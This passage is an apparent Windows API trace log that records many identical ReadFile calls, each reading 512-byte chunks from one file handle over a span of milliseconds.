lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.701] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.701] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.709] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.709] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.709] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.709] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.709] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.716] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.716] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.716] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.719] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.723] 